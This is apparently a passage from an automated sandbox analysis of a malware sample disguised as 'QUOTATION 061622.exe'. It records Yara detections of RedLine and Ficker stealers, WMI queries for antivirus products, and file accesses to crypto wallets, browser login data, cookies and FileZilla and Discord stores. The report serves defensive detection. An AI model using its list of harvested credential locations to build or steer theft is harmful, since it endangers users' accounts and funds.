                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Users\user\AppData\Roaming\Data\Data.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Users\user\AppData\Roaming\Data\Data.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: QUOTATION 061622.exe PID: 5992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 4224, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5108, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 6324, type: MEMORYSTR
                        Yara detected Ficker Stealer
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5108, type: MEMORYSTR
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: QUOTATION 061622.exe, 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0m2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: QUOTATION 061622.exe, 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: QUOTATION 061622.exe, 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                        Source: QUOTATION 061622.exe, 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0m6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: QUOTATION 061622.exe PID: 5992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 4224, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5108, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 6324, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
